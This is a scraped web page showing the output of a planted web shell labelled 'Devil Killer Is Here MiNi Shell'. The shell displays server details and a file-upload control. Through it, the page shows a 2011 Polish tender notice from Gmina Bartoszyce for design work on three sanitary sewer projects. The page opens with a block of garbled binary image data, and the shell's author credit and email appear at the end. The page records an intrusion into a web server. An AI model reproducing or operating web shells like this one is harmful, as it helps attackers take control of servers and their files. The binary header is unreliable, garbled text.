JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110603/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110603/142556-N-2011.html

<p class="kh_header"><b>Bartoszyce: wykonanie trzech różnych kompletów dokumentacji projektowych kanalizacji sanitarnych dla zadań inwestycyjnych:

1. Kanalizacja sanitarna grawitacyjno - tłoczna Kosy-Kinkajmy 2010-2012
2. Kanalizacja sanitarna grawitacyjno - tłoczna Dąbrowa - Bartoszyce 2010-2012
3. Kanalizacja sanitarna Sędławki - Bartoszyce 2010-2012</b><br>
<b>Numer ogłoszenia: 142556 - 2011; data zamieszczenia: 03.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Bartoszyce , Plac Zwycięstwa 2, 11-200 Bartoszyce, woj. warmińsko-mazurskie, tel. 089 762 77 00, faks 089 762 77 23.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bartoszyce.ug.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie trzech różnych kompletów dokumentacji projektowych kanalizacji sanitarnych dla zadań inwestycyjnych:

1. Kanalizacja sanitarna grawitacyjno - tłoczna Kosy-Kinkajmy 2010-2012
2. Kanalizacja sanitarna grawitacyjno - tłoczna Dąbrowa - Bartoszyce 2010-2012
3. Kanalizacja sanitarna Sędławki - Bartoszyce 2010-2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 4.1 Przedmiotem zamówienia jest wykonanie kompletnej dokumentacji projektowej na budowę kanalizacji sanitarnej na wymienione niżej obszary:
A. Kosy- Kinkajmy,- zadanie 1,
B. Dąbrowa - Bartoszyce,- zadanie 2,
C. Sędławki - Bartoszyce,- zadanie 3,
i uzyskanie w imieniu Zamawiającego decyzji o zatwierdzeniu projektu budowlanego i wydaniu pozwolenia na budowę.

4.2 Zakres rzeczowy przedmiotu zamówienia obejmuje:

1/ Wykonanie projektów budowlanych będących przedmiotem zamówienia, w ilości po 5 sztuk dla każdego zadania
2/ Wykonanie projektów wykonawczych będących przedmiotem zamówienia, w ilości po 4 sztuki dla każdego zadania
3/ Wykonanie specyfikacji technicznych wykonania i odbioru robót budowlanych, w ilości po 3 sztuki dla każdego zadania
4/ Wykonanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia w ilości po 4 sztuki dla każdego zadania
5/ Wykonanie przedmiaru robót, w ilości 1 sztuki dla każdego zadania
6/ Wykonanie kosztorysu inwestorskiego, w ilości 1 sztuki dla każdego z zadań
7/ Wykonanie operatów wodnoprawnych
8/ Dokonanie niezbędnych uzgodnień z właścicielami terenów, przez które przebiegała będzie zaprojektowana sieć kanalizacji sanitarnej i uzyskanie zgody na wejście z robotami na te grunty
9/ Dokonanie wszelkich pozostałych uzgodnień i niezbędnych do uzyskania pozwolenia na budowę ustaleń (koszty z tym związane poniesie Wykonawca)
10/ Opracowanie przedmiotu zamówienia w wersji papierowej w ilości egzemplarzy określonych w niniejszym opisie oraz w wersji elektronicznej w 2 egzemplarzach. Wersja elektroniczna dokumentacji projektowej wykonana  zostanie z użyciem formatów: rysunki, schematy, diagramy- pdf; opisy zestawienia, specyfikacje np. MS Word, MS Exel, Pdf.
11/ Opracowanie i złożenie w imieniu Zamawiającego wszelkich wymaganych wniosków, np. o wydanie decyzji o lokalizacji inwestycji celu publicznego, o zatwierdzenie projektu budowlanego, o wydanie pozwolenia na budowę i innych bez których nie można zrealizować przedmiotu zamówienia.
12/ Uzyskanie w imieniu Zamawiającego decyzji o zatwierdzeniu projektu budowlanego i wydaniu pozwolenia na budowę oraz pozostałych wymaganych decyzji administracyjnych

4.3 Szczegółowy opis przedmiotu zamówienia określa:
1/ Przedmiotem zamówienia jest wykonanie dokumentacji projektowej dla zadania 1, 2 i 3- dla  budowy:
a) sieci kanalizacji sanitarnej grawitacyjnej,
b) sieci kanalizacji sanitarnej tłocznej,
c) przepompowni ścieków,
d) sieci/ przyłączy energetycznych- zabezpieczających w energię elektryczną zaprojektowane przepompownie,
e) innych niezbędnych urządzeń tj. place, drogi dojazdowe, ogrodzenia itp.
pozwalających na odbiór i przesyłanie ścieków z miejscowości wskazanych poniżej.

2/ Zadanie 1: Kosy- Kinkajmy,
	Obejmuje miejscowości: Kosy, Kinkajmy- w zakresie opracowanych przez Zamawiającego map do celów projektowych,  ( przy obliczaniu średnic rur kanalizacji sanitarnej należy uwzględnić przyszłą rozbudowę kanalizacji sanitarnej tj. włączenie do projektowanej sieci następujących miejscowości: Węgoryty, Dębiany, Maszewy, Łabędnik, Sokolica Łabędnik Mały). Ścieki doprowadzane będą do oczyszczalni ścieków w miejscowości Kinkajmy.

3/ Zadanie 2: Dąbrowa - Bartoszyce,
	Obejmuje miejscowości: Dąbrowa, Dąbrowa zabudowa kolonijna- w zakresie opracowanych przez Zamawiającego map do celów projektowych. W zadaniu 2 przy projektowaniu sieci należy uwzględnić odstępstwo od Programu Funkcjonalno- Użytkowego uporządkowania gospodarki wodno- ściekowej w Gminie Bartoszyce, w którym jako miejsce włączenia sieci ks wskazano sieć na terenie miasta Bartoszyce. Sieć ks w zadaniu 2 należy zaprojektować uwzględniając miejsce włączenia do istniejącej gminnej sieci ks (HDPE O75)- w pobliżu przepompowni ścieków w miejscowości Dąbrowa- zabudowa kolonijna ( działka nr 12-471). Ścieki poprzez gminną sieć ks doprowadzane będą do oczyszczalni ścieków w miejscowości Bartoszyce. 

4/ Zadanie 3: Sędławki - Bartoszyce,
	Obejmuje miejscowości: Sędławki, Bartoszyce- w zakresie opracowanych przez Zamawiającego map do celów projektowych, ( przy obliczaniu średnic rur kanalizacji sanitarnej należy uwzględnić przyszłą rozbudowę kanalizacji sanitarnej tj. włączenie do projektowanej sieci następujących miejscowości: Ceglarki, Dębówko, Kinkajmy, Maszewy, Dębiany, Węgoryty, Kosy, Łabędnik Mały, Łabędnik, Sokolica). Ścieki doprowadzane będą do oczyszczalni ścieków w miejscowości Bartoszyce.

5/ Trasowanie przebiegu sieci z połączeniem poszczególnych miejscowości należy sporządzić przy uwzględnieniu koncepcji trasy będącej częścią programu funkcjonalno- użytkowego  uporządkowania gospodarki wodno- ściekowej w Gminie Bartoszyce dla zadań opisanych jako Zadanie 1, 2, 3. Ścieki sanitarne kanałami grawitacyjnymi spływać będą do pobliskich przepompowni ścieków i systemem ciśnieniowym tłoczone do kolejnej przepompowni aż do odbiornika.
	Odcinki przewodów kanalizacyjnych, łączące wewnętrzną instalację kanalizacyjną na terenie nieruchomości gruntowej, przyłączanej do sieci kanalizacji sanitarnej, z siecią kanalizacyjną- należy zaprojektować do granicy przyłączanej nieruchomości gruntowej i zakończyć studzienką kanalizacyjną. Nie jest przedmiotem prac projektowych zaprojektowanie przyłączy kanalizacyjnych tj. części sieci kanalizacyjnych położonych w granicach nieruchomości gruntowej przyłączanej do projektowanej sieci. Przepompownie przydomowe należy lokalizować w miarę możliwości poza przyłączana nieruchomością gruntową z zasilaniem w energię elektryczną z możliwością bezpośredniego rozliczenia się za zużytą energię elektryczną z dostawcą energii. Opracowanie nie może obejmować zaprojektowania przydomowych oczyszczalni ścieków. W miejscach włączenia projektowanych sieci należy zaprojektować urządzenia do pomiarów ilości ścieków surowych i innych urządzeń- jeżeli dysponent sieci tego zażąda.
	Zamawiający pozyskał mapy do celów projektowych w wersji papierowej i w zapisie cyfrowym, które przekaże Wykonawcy.
	Wykonawca przed złożeniem wniosku o wydanie decyzji o lokalizacji inwestycji celu publicznego opracuje na mapach w skali 1:2000 szczegółową koncepcję przebiegu sieci kanalizacyjnej wraz urządzeniami, placami, ogrodzeniami, drogami itp., po czym przedłoży ją Zamawiającemu do akceptacji wraz z wykazem właścicieli gruntów, na których projektuje się sieć kanalizacyjną wraz z kopiami uzgodnień i zgód wszystkich właścicieli. Zamawiający może zażądać zmian koncepcji szczegółowej po jej analizie lub w przypadku wniesienia zastrzeżenia przez właścicieli gruntów na których zaprojektowano sieć kanalizacyjną. Wykonawca w takim przypadku zobowiązany będzie do zastosowania rozwiązań akceptowanych przez właścicieli gruntów i przez Zamawiającego.
	Wykonawca wystąpi z kompletnym wnioskiem o decyzję o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia. Najpóźniej w ciągu 3 dni od dnia otrzymania decyzji o środowiskowych uwarunkowaniach, Wykonawca złoży w imieniu Zamawiającego kompletny wniosek o wydanie decyzji o ustaleniu lokalizacji inwestycji celu publicznego po której otrzymaniu Wykonawca rozpocznie ostateczne prace projektowe i złoży kompletny wniosek o zatwierdzenie projektu budowlanego i wydanie pozwolenia na budowę. Na co najmniej 7 dni przed planowanym terminem złożeniem wniosku o wydanie pozwolenia na budowę Wykonawca wystąpi o uzgodnienie projektu budowlanego przez Zamawiającego.
	Wykonawca zobowiązany jest własnym staraniem i na własny koszt, działając z upoważnienia Zamawiającego uzyskać wszelkie wymagane decyzje administracyjne. Za zakończenie prac projektowych uważa się otrzymanie pozwolenia na budowę, o które w imieniu Zamawiającego wystąpi Wykonawca.

6/ Opis z punktu 4.3 podpunkt 1 i 5 dotyczy każdego z wyznaczonych zadań..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.22.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 11.1 Zamawiający żąda wniesienia wadium, w wysokości 4 000 zł.

11.2 Wadium może być wniesione w jednej lub następujących formach:
1/ pieniądzu,
2/ poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3/ gwarancjach bankowych,
4/ gwarancjach ubezpieczeniowych,
5/ poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275),

11.3 Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy 43 1160 2202 0000 0000 6190 9989, natomiast wadium wnoszone w innych formach należy zdeponować w kasie Urzędu Gminy Bartoszyce. Wadium musi być wniesione nie później niż w terminie składania ofert. Za termin wniesienia wadium przyjmuje się datę uznania rachunku bankowego Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, co najmniej 2 projekty budowlane sieci kanalizacji sanitarnej o długości nie mniejszej niż 3000m każda z nich.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie co najmniej jedną osobą z uprawnieniami budowlanymi do projektowania w każdej z branż występujących przy realizacji przedmiotu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie rachunkiem bankowym o wysokości środków co najmniej 40 000,00zł bądź zdolnością kredytową o wysokości co najmniej 40 000,00zł lub łączną wysokość środków finansowych i zdolność kredytową w wysokości co najmniej 40 000,00zł, Posiadanie przez Wykonawcę ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy,
2. Dokument ustanawiający pełnomocnika w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>19.1 Umowa będzie podpisana w wyniku rozstrzygnięcia niniejszego postępowania o udzielenie zamówienia publicznego. Umowa będzie zawierała wszystkie zapisy podane we wzorze umowy będącym załącznikiem do SIWZ, z uwzględnieniem treści oferty wykonawcy.

19.2 Istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, będą mogły być wprowadzone, jeżeli ich uzasadnieniem jest wystąpienie co najmniej jednej z okoliczności wymienionych poniżej:

1/ jakiekolwiek opóźnienia, utrudnienia lub przeszkody spowodowane przez lub dające się przypisać Zamawiającemu lub personelowi Zamawiającego,
2/ zmiany obowiązujących przepisów,
3/ zmiana terminu realizacji umowy ze względu na wystąpienie okoliczności (np. z przyczyn leżących po stronie Zamawiającego, siła wyższa),
4/ rezygnacja z części robót,
5/ zmiana przedstawiciela Zamawiającego i Wykonawcy,
6/ zmiany stawki podatku VAT,

19.3 Zmiana kluczowych specjalistów może nastąpić w następujących przypadkach:
1/ śmierci, choroby, lub innych zdarzeń losowych kluczowego specjalisty,
2/ niewywiązywania się kluczowego specjalisty z obowiązków wynikających z umowy,
3/ w przypadku zmiany kluczowego specjalisty nowy kluczowy specjalista musi spełniać wymagania określone dla danego specjalisty,
4/ jeżeli zmiana kluczowego specjalisty stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od wykonawcy (np. rezygnacja itp.),
5/ zamawiający może żądać od wykonawcy zmiany kluczowego specjalisty, jeśli uzna, że kluczowy specjalista nie wykonuje swoich obowiązków wynikających z umowy,
6/ Wykonawca zobowiązany jest zmienić kluczowego specjalistę zgodnie z żądaniem Zamawiającego w terminie wskazanym we wniosku Zamawiającego,

19.4 Zmiana stawki podatku VAT następuje na zasadach:
1/ jeśli zmiana stawki VAT powodować będzie zwiększenie kosztów wykonania umowy po stronie wykonawcy, zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez wykonawcę,
2/ jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania umowy po stronie wykonawcy, zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia przez wykonawcę,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bartoszyce-ug.bip-wm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Bartoszyce
z siedzibą przy ul. Plac Zwycięstwa 2
11-200 Bartoszyce
tel. 0-89-762-77-00
fax. 0-89 762-77-24.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.06.2011 godzina 10:00, miejsce: Urząd Gminy w Bartoszycach, Plac zwycięstwa 2, 11-200 Bartoszyce, w sekretariacie- pokój nr 108.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com